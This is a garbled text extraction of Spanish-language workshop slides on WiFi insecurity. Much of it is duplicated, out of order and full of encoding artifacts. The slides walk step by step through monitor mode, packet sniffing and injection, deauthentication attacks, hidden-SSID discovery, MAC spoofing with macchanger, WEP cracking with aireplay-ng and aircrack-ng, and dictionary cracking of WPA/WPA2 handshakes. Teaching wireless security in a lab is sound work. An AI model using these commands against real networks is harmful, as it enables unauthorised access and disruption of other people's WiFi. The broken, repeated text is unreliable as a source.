httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 24: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

